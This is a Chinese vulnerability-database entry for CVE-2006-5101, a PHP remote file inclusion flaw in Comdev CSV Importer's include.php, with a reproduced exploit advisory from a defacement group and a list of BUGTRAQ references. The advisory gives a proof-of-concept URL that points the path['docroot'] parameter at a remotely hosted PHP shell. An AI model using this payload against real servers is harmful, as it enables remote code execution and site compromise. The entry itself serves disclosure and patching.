Comdev CSV Importer 'include.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193316 漏洞类型 代码注入
发布时间 2006-10-03 更新时间 2006-10-03
CVE编号 CVE-2006-5101 CNNVD-ID CNNVD-200610-037
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/84572
https://cxsecurity.com/issue/WLB-2006100024
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-037
|漏洞详情
ComdevCSVImporter3.1可能还有4.1的include.php中存在PHP远程文件包含漏洞(用在(1)ComdevContactForm3.1,(2)ComdevCustomerHelpdesk3.1,(3)ComdevEventsCalendar3.1,(4)ComdevFAQSupport3.1,(5)ComdevGuestbook3.1,(6)ComdevLinksDirectory3.1,(7)ComdevNewsPublisher3.1,(8)ComdevNewsletter3.1,(9)ComdevPhotoGallery3.1,(10)ComdevVoteCaster3.1,(11)ComdevWebBlogger3.1和(12)ComdeveCommerce3.1中),远程攻击者可以通过path[docroot]参数中的URL执行任意PHP代码。
|漏洞EXP
+--------------------------------------------------------------------

+

+ Comdev Events Calendar 3.1 :)  <= Remote File Inclusion

+

+--------------------------------------------------------------------

+

+ Affected Software .: Comdev Events Calendar 3.1

+ Venedor ...........: http://www.comdevweb.com

+ Class .............: Remote File Inclusion

+ Risk ..............: high (Remote File Execution)

+ Found by ..........: rUnViRuS

+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/

+ Contact ...........: stormhacker[at]hotmail[.]com

+

+--------------------------------------------------------------------

+

+ Code include.php:

+

+ .....

+ include($path["docroot"]."common/wce.login.php");

+ .....

+

+--------------------------------------------------------------------

+

+ $path["docroot"] is not properly sanitized before being used.

+ The bug is in the "Comdev CSV Importer" Package for Comdev CSV Importer.

+

+--------------------------------------------------------------------

+

+ Solution:

+ Add this line to your php-file:

+

+ $path["docroot"] ="user/dir" //Your root path

+

+--------------------------------------------------------------------

+ PoC:

+ Place a PHPShell on a remote location:

+ http://wdzone.net/sh.txt?

+

+

+ http://[target]/include.php?path["docroot"]=http://phpshell

+

+--------------------------------------------------------------------

+ [W]orld [D]efacers [T]eam

+ Greets:

+ || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BLaCKWHITE ||

+ || Pro Hacker ||

+

+-------------------------[ W D T ]----------------------------------
|受影响的产品
Comdev Comdev Csv Importer 4.1 Comdev Comdev Csv Importer 3.1
|参考资料

来源:BUGTRAQ
名称:20060927ComdevEventsCalendar3.1:)<=RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/447213/100/0/threaded
来源:BUGTRAQ
名称:20060927ComdevNewsletter3.1:)<=RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/447209/100/0/threaded
来源:BUGTRAQ
名称:20060927ComdevGuestbook3.1:)<=RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/447207/100/0/threaded
来源:BUGTRAQ
名称:20060927ComdevFAQSupport3.1:)<=RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/447201/100/0/threaded
来源:BUGTRAQ
名称:20060927ComdeveCommerce3.1:)<=RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/447194/100/0/threaded
来源:BUGTRAQ
名称:20060927ComdevWebBlogger3.1:)<=RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/447193/100/0/threaded
来源:BUGTRAQ
名称:20060927ComdevContactForm3.1:)<=RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/447192/100/0/threaded
来源:BUGTRAQ
名称:20060927C